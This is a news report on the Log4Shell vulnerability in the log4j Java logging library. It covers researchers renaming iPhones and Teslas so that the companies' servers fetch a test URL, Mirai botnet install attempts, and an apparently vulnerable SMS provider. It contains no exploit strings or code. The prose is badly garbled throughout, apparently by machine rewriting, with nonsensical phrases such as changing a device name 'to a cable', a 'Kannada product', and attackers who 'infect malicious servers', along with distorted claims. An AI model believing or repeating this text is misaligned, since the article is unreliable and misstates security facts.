Investigators are looking for a recent discovery and the “very bad” Log4Shell exploit claims that they have been used on devices ranging from iPhones to Tesla cars. According to shared screenshots, simply changing the device name of an iPhone or Tesla to a cable is a serious enough exploit to trigger a ping from Apple or Tesla servers, indicating that the server at the other end is vulnerable to Log4Shell.
In the revelations, the researchers changed the machine names to be a string of characters that would send servers to a test URL, abusing the behavior caused by the vulnerability. After the name was changed, incoming traffic showed URL requests from IP addresses owned by Apple and, in the case of Tesla, China Unicom – the company’s mobile service partner for the Kannada product. In short, researchers tricked Apple and Tesla servers into visiting the desired URL.
The iPhone display came from a Dutch security researcher; the second is exported to the Log4jAttackSurface Github widget repository. Assuming the images are realistic, they reflect the behavior – the collection of remote sources – that should not be done with the text contained in a device name. Evidence of this idea has led to widespread rumors that Apple and Tesla are vulnerable to the abuse.
While exposure is alarming, it does not indicate how useful it will be for cyber criminals. Ideally, an attacker can host malicious code at the site URL in order to infect malicious servers, but a well-maintained network can prevent such an attack at the network level. Broadly speaking, there is no indication that the approach could lead to any further agreement between Apple or Tesla plans. (No company responded to an email request for comment by publication time.) Log4Shell is more important for being easy to exploit
However, it is a reminder of the complex nature of technology systems, which almost always depend on the code imported from third-party libraries. Exploit Log4Shell an open-source Java application called log4j which is widely used for application logging; Although the exact number of devices is not known, researchers estimate it is in the millions, with ambiguous programs rarely targeted by attacks of this nature.
The full extent of the abuse in the wild is unknown, but in a blog post, Cado researcher platform reported finding servers trying to use this method to install Mirai botnet code.
Log4Shell is even more important for being easy to exploit. The weakness works by tricking an application into something as a link to a remote source, and trying to retrieve that source instead of saving the text as it is written. All that matters is for the vulnerable device to save the important string of characters in its application records.
This creates the potential for vulnerabilities in many systems that accept user input, because text messages can be stored in accounts. Log4j vulnerabilities were first seen in Minecraft servers, which attacks can be compromised using chat messages; and systems that send and receive other message formats such as SMS in public are also vulnerable.
At least one major SMS provider appears to be vulnerable to abuse, according to a test conducted by The Verge. When sent to numbers activated by an SMS provider, text messages containing malicious code trigger a response from company servers revealing information about the IP address and host name, suggesting that the servers may be turn to run malicious code. Calls and emails to the company just did not respond at the time of publication. An update to the log4j library has been released to reduce the vulnerability, but patching of all weak devices will take time given the challenges of industry software updates.